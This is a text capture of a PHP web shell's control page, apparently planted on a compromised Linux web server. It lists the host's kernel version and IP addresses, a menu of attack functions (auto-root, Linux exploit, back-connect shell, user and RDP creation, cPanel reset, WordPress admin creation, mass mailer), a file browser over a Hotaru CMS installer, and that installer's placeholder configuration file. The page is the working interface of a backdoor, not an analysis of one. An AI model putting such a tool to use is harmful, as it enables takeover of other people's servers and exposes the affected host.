Linux server1.sbs.cy 5.14.0-362.18.1.el9_3.x86_64 #1 SMP PREEMPT_DYNAMIC Mon Jan 29 07:05:48 EST 2024 x86_64
Apache
: 199.192.25.12 | : 172.70.100.212
28 Domain
8.1.31
administrator
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
var /
softaculous /
hotaru /
[ HOME SHELL ]
Name
Size
Permission
Action
images
[ DIR ]
drwxr-xr-x
php53
[ DIR ]
drwxr-xr-x
php56
[ DIR ]
drwxr-xr-x
php71
[ DIR ]
drwxr-xr-x
php81
[ DIR ]
drwxr-xr-x
php82
[ DIR ]
drwxr-xr-x
edit.php
12.2
KB
-rw-r--r--
edit.xml
433
B
-rw-r--r--
fileindex.php
210
B
-rw-r--r--
import.php
3.14
KB
-rw-r--r--
info.xml
2.64
KB
-rw-r--r--
install.js
921
B
-rw-r--r--
install.php
6.33
KB
-rw-r--r--
install.xml
754
B
-rw-r--r--
md5
4.29
KB
-rw-r--r--
notes.txt
187
B
-rw-r--r--
settings.php
878
B
-rw-r--r--
update_pass.php
5.38
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : settings.php
<?php /* Configuration file for Hotaru CMS. */ // Paths define("BASEURL", '[[softurl]]/'); // e.g. http://www.mysite.com/ Needs trailing slash (/) // Database details define("DB_USER", '[[softdbuser]]'); // Add your own database details define("DB_PASSWORD", '[[softdbpass]]'); define("DB_NAME", '[[softdb]]'); define("DB_HOST", '[[softdbhost]]'); // You probably won't need to change this // You probably don't need to change these define("DB_PREFIX", '[[dbprefix]]'); // Database prefix, e.g. "hotaru_" define("DB_LANG", 'en'); // Database language, e.g. "en" define('DB_CHARSET', 'utf8'); // Database Character Set (UTF8 is Recommended), e.g. "utf8" define("DB_COLLATE", 'utf8_unicode_ci'); // Database Collation (UTF8 is Recommended), e.g. "utf8_unicode_ci" define("LANGUAGE_ADMIN", 'en'); define("LANGUAGE_MAIN", 'en'); ?>
Close